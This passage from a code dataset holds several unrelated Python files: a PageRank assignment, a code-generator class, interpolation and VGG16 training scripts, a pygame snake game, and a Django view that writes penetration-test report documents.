np.reshape(var_array_notnan[1:,ind+1,:], [-1])\n dfs[j][vars[i]+'_i+2'] = np.reshape(var_array_notnan[1:,ind+2,:], [-1])\n except IndexError:\n pass\n \n return dfs","sub_path":"n3_neighborhood_based_narval_r2b4/source_code/for_preprocessing.py","file_name":"for_preprocessing.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"219710502","text":"'''\nAssignment 3 Programming SENG 474\nFile: question_2a.py\nAuthors: Luke Rowe, Luo Dai\nVersion: Final\n\nThis program runs the page rank algorithm on a dataset of 10000 nodes\n'''\n\n\nimport time\nfrom collections import deque\nimport numpy as np\n\n# number used to avoid division by 0\nSMALL_NUM = 0.0001\n\n'''\nThis function prepares data structures to hold data about the link structure \nwithout dead ends removed.\n\nparam(s): lines: list: list of lines from the input file\nret: nodes: set: set of nodes in the original link structure\n edges: set of tuples: set of ordered tuples (from_node,to_node) containing the \n edges in the link structure\n Np: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that link to the node_id of the key\n Nm: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that the key links to\n'''\ndef preprocess(lines):\n # set of nodes in the link structure\n nodes = set()\n edges = set()\n #dictionary of lists where Np[i] is a list of nodes that link to i\n Np = {}\n # dictionary of lists where N-[i] is a list of nodes that i links to\n Nm = {}\n\n for i in lines[4:]:\n if len(i.split('\\t')) == 2:\n # convert from tuple of strings to tuple of ints\n (from_node, to_node) = tuple(map(int, i.split('\\t')))\n edges.add((from_node, to_node))\n\n # append from_node to N^+[to_node]\n if to_node in Np.keys():\n Np[to_node].add(from_node)\n else:\n Np[to_node] = set([from_node])\n\n # append to_node to 
N^-[from_node]\n if from_node in Nm.keys():\n Nm[from_node].add(to_node)\n else:\n Nm[from_node] = set([to_node])\n\n # take the union of the keys in the Nm and Np dictionary\n # to get the set of nodes\n nodes = set(Np).union(set(Nm))\n for i in set(Np).difference(set(Nm)):\n Nm[i] = set([])\n for i in set(Nm).difference(set(Np)):\n Np[i] = set([])\n\n return nodes, edges, Nm, Np\n\n'''\nThis function finds and returns the dead ends in the link structure\nparam(s): nodes: set: the set of nodes in the original link structure\n Np: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that link to the node_id of the key\n Nm: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that the key links to \nret: set: set of removed node_ids in removal order\n'''\ndef find_dead_ends(nodes, Nm, Np):\n # dictionary of out-degrees\n D = {}\n # queue of temporary dead ends\n q = deque([])\n\n # find out-degree of each node\n for node in nodes:\n D[node] = len(Nm[node])\n if D[node] == 0:\n q.append(node)\n\n # we make dead_end a dictionary so that we have fast tests for containment\n # and preservation of order (since python dictionaries are insertion ordered (after 3.7))\n dead_ends = {}\n\n while len(q) != 0:\n i = q.popleft()\n if i not in dead_ends.keys():\n dead_ends[i] = None\n for j in Np[i]:\n D[j] = D[j] - 1\n if D[j] == 0:\n q.append(j)\n\n # return the keys of the dead_ends in removal order\n return dead_ends.keys()\n\n'''\nThis function removes dead_ends from the data structures containing the graph\n\nparam(s): nodes: set: set of nodes in the original graph\n edges: set of tuples: set of ordered tuples (from_node,to_node) containing the \n edges in the original graph\n dead_ends: set: set of dead end nodes in the graph\nret: nodes: set: set of nodes in the updated graph\n edges: set of tuples: set of ordered tuples (from_node,to_node) containing the \n edges in the updated graph\n Np: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that link to the node_id of the key in the updated graph\n Nm: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that the key links to in the updated graph\n'''\ndef update_graph(nodes, edges, dead_ends):\n # Nm, Np for graph without dead_ends\n Nm = {}\n Np = {}\n\n # remove the dead ends from the graph\n nodes.difference_update(dead_ends)\n\n # make copy of edges to iterate through\n edges_copy = edges.copy()\n\n # remove edges containing dead ends\n for (from_node, to_node) in edges_copy:\n if (to_node in dead_ends) or (from_node in dead_ends):\n edges.remove((from_node, to_node))\n\n # Nm and Np creates according to graph with no dead ends\n for (from_node, to_node) in edges:\n # append from_node to N^+[to_node]\n if to_node in Np.keys():\n Np[to_node].add(from_node)\n else:\n Np[to_node] = set([from_node])\n\n # append to_node to N^-[from_node]\n if from_node in Nm.keys():\n Nm[from_node].add(to_node)\n else:\n Nm[from_node] = set([to_node])\n\n # there may be nodes with no incoming edges that needs to be added to Np\n for i in set(Nm).difference(set(Np)):\n Np[i] = set([])\n\n # set the dead_end nodes to have no incoming or outgoing edges\n # so that we can compute pagerank scores of non_dead_end nodes and\n # still traverse through dead_end nodes\n for node in dead_ends:\n Np[node] = set([])\n Nm[node] = set([])\n\n return nodes, edges, Nm, Np\n\n'''\nThis function computes and returns the page rank scores for nodes in the updated graph.\n\nparam(s): v: 
ndarray: array containing page rank scores for each node in original graph\n D: ndarray: array containing outdegrees for each node in the updated_graph\n find_array_idx: dict: maps a node_id to the array index corresponding to that node\n find_node_id: dict: maps an array index to the node_id corresponding to that index\n N_with_de: int: number of nodes with dead ends\n N: int: number of nodes with dead_ends removed\nret: v: ndarray: arrray of updated pageranks scores (for non-dead_end nodes)\n'''\ndef page_rank(v, D, Np, find_array_idx, find_node_id, N_with_de, N):\n beta = 0.85\n T = 10\n\n # T= 10 epochs\n for epoch in range(T):\n # copy previous pagerank vector\n v_before = v.copy()\n # vector containing term inside the summation (of pagerank equation)\n inside_sum = v_before / D;\n #update v element-wise (to save memory)\n for i in range(N_with_de):\n sum = 0\n #sum over the edges that links to node_id and sum the \"inside_sum\" term\n for node_id in Np[find_node_id[i]]:\n sum += inside_sum[find_array_idx[node_id]]\n\n v[i] = beta * sum + (1/N) * (1 - beta)\n\n return v\n\n'''\nThis function computes and returns the page rank scores for the dead end nodes of the graph.\n\nparam(s): v: ndarray: array containing page rank scores for each node in original graph\n D_with_de: ndarray: array containing outdegrees for each node in the orig graph\n dead_ends : set: set of dead ends in the graph\n N_with_de: int number of nodes with dead ends\n find_array_idx: dict: maps a node_id to the array index corresponding to that node\nret: v: ndarray: arrray of updated pageranks scores (for dead_end nodes) \n'''\ndef page_rank_dead_ends(v, D_with_de, dead_ends, Np_with_de, find_array_idx):\n # assign dead_end page rank scores to 0 (as they were assigned arbitary values\n # in the computation of non_dead_end pagerank scores)\n for node in dead_ends:\n v[find_array_idx[node]] = 0\n\n # vector containing term inside the summation (of equation)\n inside_sum = v / D_with_de\n\n # compute page rank score in reverse removal order\n for node in reversed(list(dead_ends)):\n sum = 0\n for node_id in Np_with_de[node]:\n sum += inside_sum[find_array_idx[node_id]]\n v[find_array_idx[node]] = sum\n\n #make change to \"inside_sum\" array instead of recomputing entire array to save computation time\n inside_sum[find_array_idx[node]] = sum / D_with_de[find_array_idx[node]]\n\n return v\n\n\ndef main():\n f = open(\"./web-Google_10k.txt\", \"r\")\n output = open(\"./PR_10k.tsv\", \"w\")\n # list of lines of the input file\n lines = [line.rstrip('\\n') for line in f]\n # \"with_de\" means \"with dead ends\"\n nodes, edges, Nm_with_de, Np_with_de = preprocess(lines)\n\n # find the dead ends in the graph\n dead_ends = find_dead_ends(nodes, Nm_with_de, Np_with_de)\n\n # keep copy of the nodes with dead ends included\n nodes_with_de = nodes.copy()\n N_with_de = len(nodes_with_de)\n\n # remove the dead ends from the graph\n nodes, edges, Nm, Np = update_graph(nodes,edges,dead_ends)\n N = len(nodes)\n\n # we initialize all variables in one pass through nodes to save computation time\n #initial page rank score\n init_score = 1 / N\n #vector of page rank scores\n v = np.zeros(N_with_de)\n # vector of out-degrees for graph without dead_end nodes\n D = np.zeros(N_with_de)\n # vector of out-degrees for original link structure\n D_with_de = np.zeros(N_with_de)\n # dictionary that maps node ids to its corresponding array index\n find_array_idx = {}\n # dictionary that maps array indexes to its corresponding node id\n find_node_id = 
{}\n\n i = 0\n for node in nodes_with_de:\n D[i] = len(Nm[node])\n # set from 0 to 0.0001 to avoid future division by zero\n if D[i] == 0: D[i] = SMALL_NUM\n D_with_de[i] = len(Nm_with_de[node])\n if D_with_de[i] == 0: D_with_de[i] = SMALL_NUM\n\n v[i] = float(init_score)\n\n # assign array index/node_id mappings\n find_array_idx[node] = i\n find_node_id[i] = node\n i += 1\n\n # compute page-rank scores for all the non-dead_end nodes\n v = page_rank(v, D, Np, find_array_idx, find_node_id, N_with_de, N)\n v = page_rank_dead_ends(v, D_with_de, dead_ends, Np_with_de, find_array_idx)\n\n output_list = [None]*N_with_de\n i = 0\n for node_id in nodes_with_de:\n output_list[i] = (node_id, v[find_array_idx[node_id]])\n i+=1\n\n #list of nodes,pagerank score in descending order by pagerank score\n output_list = sorted(output_list, key=lambda x: x[1], reverse=True)\n\n #write to tsv file\n output.write(\"PageRank\" + \"\\t\" + \"Ids\\n\")\n for i in range(N_with_de):\n output.write(str(output_list[i][1]) + \"\\t\" + str(output_list[i][0]) + \"\\n\")\n\nif __name__ == \"__main__\":\n t0 = time.perf_counter()\n main()\n print(time.perf_counter() - t0)","sub_path":"Assignment3/question_2a.py","file_name":"question_2a.py","file_ext":"py","file_size_in_byte":10612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269411718","text":"# Copyright 2021 Wechat Group, Tencent\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ir.node\nfrom backend.cppcode.nodegenerator.nodegenerator import NodeGenerator\nfrom backend.cppcode.common import get_cpp_constant_value\n\n\nclass Flatten(NodeGenerator):\n @classmethod\n def accept(cls, node: ir.node.Node):\n return isinstance(node, ir.node.base.Flatten)\n\n @property\n def code(self):\n str_s0 = [\"1u\"]\n for i in range(self.node.axis):\n str_s0.append(\"{inputs[0]}.shape({i})\".format(i=i, **self.fmt_dict))\n str_s1 = [\"1u\"]\n for i in range(self.node.axis, len(self.inputs[0].shape)):\n str_s1.append(\"{inputs[0]}.shape({i})\".format(i=i, **self.fmt_dict))\n shape = \"{\" + \" * \".join(str_s0) + \", \" + \" * \".join(str_s1) + \"}\"\n return \"tfcc::View<{outputs[0].dtype}> {outputs[0]}({inputs[0]}, tfcc::Shape({shape}));\\n\".format(\n shape=shape, **self.fmt_dict\n )\n","sub_path":"tfcc_code_generator/backend/cppcode/nodegenerator/base/flatten.py","file_name":"flatten.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"26569810","text":"# coordinates on x-axis\r\nwith open(\"points_for_interpolation.pr4\") as fx:\r\n lines = fx.read().splitlines()\r\npoints = [float(item) for item in lines]\r\n\r\n# Chebyshev points and values of polynomial there\r\nwith open(\"cheb_y.pr4\") as fy:\r\n lines = fy.read().splitlines()\r\nchebY = [float(item) for item in lines]\r\n\r\n# Equidistant points and values of polynomial there\r\nwith open(\"equidist_y.pr4\") as fy:\r\n lines = fy.read().splitlines()\r\nequidistY = 
[float(item) for item in lines]\r\n\r\n# imports required by the plotting code below (the original file omitted them)\r\nimport numpy as np\r\nfrom numpy import array\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import interpolate\r\n\r\n# Function graph\r\nxmin = -100.0\r\nxmax = 100.0\r\ndx = 0.001\r\n\r\n# mlab.frange was removed from matplotlib; np.arange with an extra dx keeps the inclusive endpoint\r\nxlist = np.arange(xmin, xmax + dx, dx)\r\nylist = [np.exp(-z * z) for z in xlist]\r\nplt.plot(xlist, ylist, 'r')\r\n\r\ntext = 'quadratic'\r\n\r\n# Chebyshev graph\r\nchebXarray = array(points)\r\nchebYarray = array(chebY)\r\nf = interpolate.interp1d(chebXarray, chebYarray, kind=text)\r\nxnew = np.linspace(chebXarray.min(), chebXarray.max())\r\n\r\n# Equidistant graph\r\nx_ = array(points)\r\ny_ = array(equidistY)\r\nF = interpolate.interp1d(x_, y_, kind=text)\r\nXnew = np.linspace(x_.min(), x_.max())\r\n\r\nplt.plot(xnew, f(xnew), 'g')\r\nplt.plot(Xnew, F(Xnew), 'b')\r\n\r\nplt.legend((\"f(x)\", \"Chebyshev\", \"Equidistant\"))\r\n\r\nplt.axis([-2, 2, 0, 2])\r\nplt.show()\r\n","sub_path":"Interpolation Polynomial graph.py","file_name":"Interpolation Polynomial graph.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"170619814","text":"from tensorflow.keras.applications import VGG16\n#from keras.datasets import mnist\n#from keras.utils import to_categorical\nfrom tensorflow.keras import models\nfrom tensorflow.keras.layers import Dense,Flatten,Dropout\nimport cv2\nimport numpy as np\nimport tensorflow.compat.v1 as tf_v1\nimport tensorflow as tf\nfrom tensorflow.keras import layers\n\ndata_dir = '/export/home/iceicehyhy/dataset/MNIST_224X224_3/train'\nimg_height = 224\nimg_width = 224\nbatch_size = 32\n\ntest_data_dir = '/export/home/iceicehyhy/dataset/MNIST_224X224_3/test'\n\ntf.debugging.set_log_device_placement(True)\n\ntry:\n    # pin the work to a specific GPU device\n    with tf.device('/device:GPU:2'):\n        train_ds = tf.keras.preprocessing.image_dataset_from_directory(\n            data_dir,\n            validation_split=0.2,\n            labels = 'inferred',\n            label_mode = 'int',\n            color_mode = 'rgb',\n            subset=\"training\",\n            seed=123,\n            image_size=(img_height, img_width),\n            batch_size=batch_size)\n\n        val_ds = tf.keras.preprocessing.image_dataset_from_directory(\n            data_dir,\n            validation_split=0.2,\n            labels = 'inferred',\n            label_mode = 'int',\n            color_mode = 'rgb',\n            subset=\"validation\",\n            seed=123,\n            image_size=(img_height, img_width),\n            batch_size=batch_size)\n\n        test_ds = tf.keras.preprocessing.image_dataset_from_directory(\n            test_data_dir,\n            labels = 'inferred',\n            label_mode = 'int',\n            color_mode = 'rgb',\n            seed=123,\n            image_size=(img_height, img_width),\n            batch_size=batch_size)\n\n        normalization_layer = tf.keras.layers.experimental.preprocessing.Rescaling(1./255)\n        normalized_train_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\n        normalized_val_ds = val_ds.map(lambda x, y: (normalization_layer(x), y))\n        #image_batch, labels_batch = next(iter(normalized_ds))\n\n        # You could either manually tune this value, or set it to tf.data.AUTOTUNE, which will prompt the tf.data runtime to tune the value dynamically at runtime.\n        AUTOTUNE = tf.data.experimental.AUTOTUNE\n        train_ds = normalized_train_ds.cache().prefetch(buffer_size=AUTOTUNE)\n        val_ds = normalized_val_ds.cache().prefetch(buffer_size=AUTOTUNE)\n        # manual retrieval\n        # for image_batch, labels_batch in train_ds:\n        #     print(image_batch.shape)\n        #     print(labels_batch.shape)\n        #     break\n\n        # build the model\n        print (\"creating the model\")\n        # conv_base=VGG16(weights=None,\n        # \t\t\t\tinclude_top=False,\n        # \t\t\t\tinput_shape=(224,224,3),\n        # \t\t\t\t)\n\n        conv_base = VGG16(weights=None, include_top=False, input_shape=(224,224,3),)\n        print (\"base model created\")\n
conv_base.trainable = True\n        model = tf.keras.Sequential()\n        model.add(conv_base)\n        # flatten the input [1, 10, 64] ---> [640]\n        model.add(Flatten())\n        model.add(Dense(4096, activation=\"relu\"))\n        model.add(Dropout(0.5))\n        # layer 14\n        model.add(Dense(4096, activation=\"relu\"))\n        model.add(Dropout(0.5))\n        # layer 15\n        model.add(Dense(10, activation=\"softmax\"))\n        model.summary()\n\n        # compile the model\n        print (\"compiling the model\")\n        sgd = tf.keras.optimizers.SGD(learning_rate=0.05, momentum=0.0)\n        Nadam = tf.keras.optimizers.Nadam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-07)\n        # fixed: the original constructed a second Nadam here even though the variable is named adam\n        adam = tf.keras.optimizers.Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-07)\n        loss = tf.losses.SparseCategoricalCrossentropy(from_logits=False)\n\n        # using sparse_categorical_crossentropy because the label is in integer form, use categorical_crossentropy if in matrix form\n        model.compile(optimizer=adam, loss=loss, metrics=[\"accuracy\"])\n        print (\"model compiled\")\n\n        # train the model\n        model.fit(\n            train_ds,\n            validation_data=val_ds,\n            epochs=3\n        )\n\n        # evaluate the model\n        test_loss, test_acc = model.evaluate(test_ds)\n        print(\"The accuracy is:\" + str(test_acc))\nexcept RuntimeError as e:\n    print(e)\n\n\n","sub_path":"vgg16_train_gpu.py","file_name":"vgg16_train_gpu.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534342766","text":"'''\nMiniSnake.py\n\nA game of snake in one .py file\n\n\nThis program by Daniel Westbrook\nwebsite: www.pixelatedawesome.com\nemail: thepixelator72@gmail.com\n\t (or whatever email I list on my site, if I stop using that one)\n\nLegal shit:\n\tCopyright (C) 2008 Daniel Westbrook\n\n\tThis program is free software: you can redistribute it and/or modify\n\tit under the terms of the GNU Lesser General Public License as published by\n\tthe Free Software Foundation, either version 3 of the License, or\n\t(at your option) any later version.\n\n\tThis program is distributed in the hope that it will be useful,\n\tbut WITHOUT ANY WARRANTY; without even the implied warranty of\n\tMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n\tGNU Lesser General Public License for more details.\n\n\tYou should have received a copy of the GNU Lesser General Public License\n\talong with this program. 
If not, see <http://www.gnu.org/licenses/>.\n'''\nimport pygame\nfrom pygame.locals import *\nimport random\n\n# ---------- constants ---------- #\nSCREENSIZE = (800, 600)\nSCREENRECT = pygame.Rect(0, 0, SCREENSIZE[0], SCREENSIZE[1])\nCAPTION = 'MiniSnake'\nFPS = 40\n\nSTART_TILE = (20, 20)\nSTART_SEGMENTS = 7\n\nMOVE_RATE = 2\nDIFFICULTY_INCREASE_RATE = .05\nMOVE_THRESHOLD = 5 # when moverate counts up to this the snake moves\nBLOCK_SPAWN_RATE = 2\n\nTILE_SIZE = (10, 10)\nTILE_RECT = pygame.Rect(0, 0, TILE_SIZE[0], TILE_SIZE[1])\n\n# integer division so random.randint() below gets ints under Python 3\nSCREENTILES = ((SCREENSIZE[0] // TILE_SIZE[0]) - 1, (SCREENSIZE[1] // TILE_SIZE[1]) - 1)\n\nSNAKE_HEAD_RADIUS = 5\nSNAKE_SEGMENT_RADIUS = 4\nFOOD_RADIUS = 4\n\nBACKGROUND_COLOR = (255, 255, 255)\nSNAKE_HEAD_COLOR = (150, 0, 0)\nSNAKE_SEGMENT_COLOR = (255, 0, 0)\nFOOD_COLOR = (0, 255, 0)\nBLOCK_COLOR = (0, 0, 150)\nCOLORKEY_COLOR = (255, 255, 0)\n\nSCORE_COLOR = (0, 0, 0)\nSCORE_POS = (20, 20)\nSCORE_PREFIX = 'Score: '\n\nMOVE_VECTORS = {'left' : (-1, 0),\n\t\t\t\t'right' : (1, 0),\n\t\t\t\t'up' : (0, -1),\n\t\t\t\t'down' : (0, 1)\n\t\t\t\t}\nMOVE_VECTORS_PIXELS = {'left' : (-TILE_SIZE[0], 0),\n\t\t\t\t\t 'right' : (TILE_SIZE[0], 0),\n\t\t\t\t\t 'up' : (0, -TILE_SIZE[1]),\n\t\t\t\t\t 'down' : (0, TILE_SIZE[1])\n\t\t\t\t\t }\n\n\n# ----------- game objects ----------- #\nclass snake_segment(pygame.sprite.Sprite):\n\tdef __init__(self, tilepos, segment_groups, color = SNAKE_SEGMENT_COLOR, radius = SNAKE_SEGMENT_RADIUS):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = pygame.Surface(TILE_SIZE).convert()\n\t\tself.image.fill(COLORKEY_COLOR)\n\t\tself.image.set_colorkey(COLORKEY_COLOR)\n\t\tpygame.draw.circle(self.image, color, TILE_RECT.center, radius)\n\t\t\n\t\tself.tilepos = tilepos\n\t\t\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = (tilepos[0] * TILE_SIZE[0], tilepos[1] * TILE_SIZE[1])\n\t\t\n\t\tself.segment_groups = segment_groups\n\t\tfor group in segment_groups:\n\t\t\tgroup.add(self)\n\t\t\n\t\tself.behind_segment = None\n\t\t\n\t\tself.movedir = 'left'\n\t\n\tdef add_segment(self):\n\t\t# walk to the last segment and append a new one behind it\n\t\tseg = self\n\t\twhile True:\n\t\t\tif seg.behind_segment is None:\n\t\t\t\tx = seg.tilepos[0]\n\t\t\t\ty = seg.tilepos[1]\n\t\t\t\tif seg.movedir == 'left':\n\t\t\t\t\tx += 1\n\t\t\t\telif seg.movedir == 'right':\n\t\t\t\t\tx -= 1\n\t\t\t\telif seg.movedir == 'up':\n\t\t\t\t\ty += 1\n\t\t\t\telif seg.movedir == 'down':\n\t\t\t\t\ty -= 1\n\t\t\t\tseg.behind_segment = snake_segment((x, y), seg.segment_groups)\n\t\t\t\tseg.behind_segment.movedir = seg.movedir\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tseg = seg.behind_segment\n\t\n\tdef update(self):\n\t\tpass\n\t\n\tdef move(self):\n\t\tself.tilepos = (self.tilepos[0] + MOVE_VECTORS[self.movedir][0], self.tilepos[1] + MOVE_VECTORS[self.movedir][1])\n\t\tself.rect.move_ip(MOVE_VECTORS_PIXELS[self.movedir])\n\t\tif self.behind_segment is not None:\n\t\t\tself.behind_segment.move()\n\t\t\tself.behind_segment.movedir = self.movedir\n\nclass snake_head(snake_segment):\n\tdef __init__(self, tilepos, movedir, segment_groups):\n\t\tsnake_segment.__init__(self, tilepos, segment_groups, color = SNAKE_HEAD_COLOR, radius = SNAKE_HEAD_RADIUS)\n\t\tself.movedir = movedir\n\t\tself.movecount = 0\n\t\n\tdef update(self):\n\t\tself.movecount += MOVE_RATE\n\t\tif self.movecount > MOVE_THRESHOLD:\n\t\t\tself.move()\n\t\t\tself.movecount = 0\n\nclass food(pygame.sprite.Sprite):\n\tdef __init__(self, takenupgroup):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = 
pygame.Surface(TILE_SIZE).convert()\n\t\tself.image.fill(COLORKEY_COLOR)\n\t\tself.image.set_colorkey(COLORKEY_COLOR)\n\t\tpygame.draw.circle(self.image, FOOD_COLOR, TILE_RECT.center, FOOD_RADIUS)\n\t\t\n\t\tself.rect = self.image.get_rect()\n\t\t# re-roll the position until the food lands on a free tile; the original\n\t\t# 'continue' only skipped one sprite of the inner for loop, so an\n\t\t# occupied tile was never actually re-rolled\n\t\twhile True:\n\t\t\tself.rect.topleft = (random.randint(0, SCREENTILES[0]) * TILE_SIZE[0], random.randint(0, SCREENTILES[1]) * TILE_SIZE[1])\n\t\t\tif not any(self.rect.colliderect(sprt.rect) for sprt in takenupgroup):\n\t\t\t\tbreak # no collision, food can go here\n\nclass block(pygame.sprite.Sprite):\n\tdef __init__(self, takenupgroup):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.image = pygame.Surface(TILE_SIZE).convert()\n\t\tself.image.fill(BLOCK_COLOR)\n\t\t\n\t\tself.rect = self.image.get_rect()\n\t\t# same re-roll fix as in food above\n\t\twhile True:\n\t\t\tself.rect.topleft = (random.randint(0, SCREENTILES[0]) * TILE_SIZE[0], random.randint(0, SCREENTILES[1]) * TILE_SIZE[1])\n\t\t\tif not any(self.rect.colliderect(sprt.rect) for sprt in takenupgroup):\n\t\t\t\tbreak # no collision, block can go here\n\n\n# -------------- game logic ------------ #\ndef main():\n\tpygame.init()\n\tscreen = pygame.display.set_mode(SCREENSIZE)\n\tpygame.display.set_caption(CAPTION)\n\tbg = pygame.Surface(SCREENSIZE).convert()\n\tbg.fill(BACKGROUND_COLOR)\n\tscreen.blit(bg, (0, 0))\n\t\n\tsnakegroup = pygame.sprite.Group()\n\tsnakeheadgroup = pygame.sprite.Group()\n\tfoodgroup = pygame.sprite.Group()\n\tblockgroup = pygame.sprite.Group()\n\ttakenupgroup = pygame.sprite.Group()\n\tall = pygame.sprite.RenderUpdates()\n\t\n\tsnake = snake_head(START_TILE, 'right', [snakegroup, all, takenupgroup])\n\tsnakeheadgroup.add(snake)\n\tfor index in range(START_SEGMENTS):\n\t\tsnake.add_segment()\n\t\n\tcurrentfood = 'no food'\n\t\n\tblock_frame = 0\n\t\n\tcurrentscore = 0\n\t\n\tpygame.display.flip()\n\t\n\t# mainloop\n\tquit = False\n\tclock = pygame.time.Clock()\n\tlose = False\n\twhile not quit:\n\t\t# events\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\tquit = True\n\t\t\telif event.type == KEYDOWN:\n\t\t\t\tcurrentmovedir = snake.movedir\n\t\t\t\ttomove = dontmove = None # only set by the arrow keys; previously non-arrow keys left these unbound\n\t\t\t\tif event.key == K_UP:\n\t\t\t\t\ttomove = 'up'\n\t\t\t\t\tdontmove = 'down'\n\t\t\t\telif event.key == K_DOWN:\n\t\t\t\t\ttomove = 'down'\n\t\t\t\t\tdontmove = 'up'\n\t\t\t\telif event.key == K_LEFT:\n\t\t\t\t\ttomove = 'left'\n\t\t\t\t\tdontmove = 'right'\n\t\t\t\telif event.key == K_RIGHT:\n\t\t\t\t\ttomove = 'right'\n\t\t\t\t\tdontmove = 'left'\n\t\t\t\tif tomove is not None and currentmovedir != dontmove:\n\t\t\t\t\tsnake.movedir = tomove\n\t\t\n\t\t# clearing\n\t\tall.clear(screen, bg)\n\t\t\n\t\t# updates\n\t\tall.update()\n\t\t\n\t\tif currentfood == 'no food':\n\t\t\tcurrentfood = food(takenupgroup)\n\t\t\tfoodgroup.add(currentfood)\n\t\t\ttakenupgroup.add(currentfood)\n\t\t\tall.add(currentfood)\n\t\t\n\t\t# the player loses when the snake's head leaves the screen\n\t\tpos = snake.rect.topleft\n\t\tif pos[0] < 0 or pos[0] >= SCREENSIZE[0] or pos[1] < 0 or pos[1] >= SCREENSIZE[1]:\n\t\t\tquit = True\n\t\t\tlose = True\n\t\t\n\t\t# collisions\n\t\t# head -> tail\n\t\tcol = pygame.sprite.groupcollide(snakeheadgroup, snakegroup, False, False)\n\t\tfor head in col:\n\t\t\tfor tail in col[head]:\n\t\t\t\tif tail is not snake:\n\t\t\t\t\tquit = True\n\t\t\t\t\tlose = True\n\t\t# head -> 
food\n\t\tcol = pygame.sprite.groupcollide(snakeheadgroup, foodgroup, False, True)\n\t\tfor head in col:\n\t\t\tfor tail in col[head]:\n\t\t\t\tcurrentfood = 'no food'\n\t\t\t\tsnake.add_segment()\n\t\t\t\tcurrentscore += 1\n\t\t\t\tglobal MOVE_RATE, DIFFICULTY_INCREASE_RATE\n\t\t\t\tMOVE_RATE += DIFFICULTY_INCREASE_RATE\n\t\t\t\tblock_frame += 1\n\t\t\t\tif block_frame >= BLOCK_SPAWN_RATE:\n\t\t\t\t\tblock_frame = 0\n\t\t\t\t\tb = block(takenupgroup)\n\t\t\t\t\tblockgroup.add(b)\n\t\t\t\t\ttakenupgroup.add(b)\n\t\t\t\t\tall.add(b)\n\t\t# head -> blocks\n\t\tcol = pygame.sprite.groupcollide(snakeheadgroup, blockgroup, False, False)\n\t\tfor head in col:\n\t\t\tfor collidedblock in col[head]:\n\t\t\t\tquit = True\n\t\t\t\tlose = True\n\t\t\n\t\t# score\n\t\td = screen.blit(bg, SCORE_POS, pygame.Rect(SCORE_POS, (50, 100)))\n\t\tf = pygame.font.Font(None, 12)\n\t\tscoreimage = f.render(SCORE_PREFIX + str(currentscore), True, SCORE_COLOR)\n\t\td2 = screen.blit(scoreimage, SCORE_POS)\n\t\t\n\t\t# drawing\n\t\tdirty = all.draw(screen)\n\t\tdirty.append(d)\n\t\tdirty.append(d2)\n\t\t\n\t\t# updating\n\t\tpygame.display.update(dirty)\n\t\t\n\t\t# waiting\n\t\tclock.tick(FPS)\n\t\n\t# game over\n\tif lose == True:\n\t\tf = pygame.font.Font(None, 300)\n\t\tfailmessage = f.render('FAIL', True, (0, 0, 0))\n\t\tfailrect = failmessage.get_rect()\n\t\tfailrect.center = SCREENRECT.center\n\t\tscreen.blit(failmessage, failrect)\n\t\tpygame.display.flip()\n\t\tpygame.time.wait(2000)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"snake/MiniSnake.py","file_name":"MiniSnake.py","file_ext":"py","file_size_in_byte":8583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610467761","text":"from django.shortcuts import render\nfrom docx import Document\nfrom .models import IMG\nfrom django.http import JsonResponse\n\ndef index(request):\n return render(request, 'form.html')\n\n\ndef img(request):\n return render(request, 'img.html')\n\n\ndef word_post(request):\n sqlinum=1\n if request.POST:\n print(request.POST)\n while request.POST.get('sqlino'+str(sqlinum)):\n sqlistrnum = str(sqlinum)\n print(request.POST.get('sqlino'+sqlistrnum))\n print(request.POST.get('sqliurl' + sqlistrnum))\n print(request.POST.get('sqlidesc' + sqlistrnum))\n for deltail in request.POST.getlist('sqli'+sqlistrnum):\n print(deltail)\n print(request.POST.get('sqliadv' + sqlistrnum))\n print(request.POST.get('sqlivuln' + sqlistrnum))\n sqlinum+=1\n document = Document()\n document.add_heading('渗透测试文档1', 0)\n #print(os.path.dirname(os.path.abspath(__file__)))\n #print(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n #document.add_picture(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+\"\\\\static\\\\upload\\\\\"+request.POST.get('cover-img'))\n document.add_page_break()\n document.save('渗透测试报告1.docx')\n return render(request, \"hello.html\")\n\n\ndef upload(request):\n imgname=[]\n if request.method == 'POST':\n for pic in request.FILES.getlist('file'):\n new_img = IMG(\n img=pic\n )\n 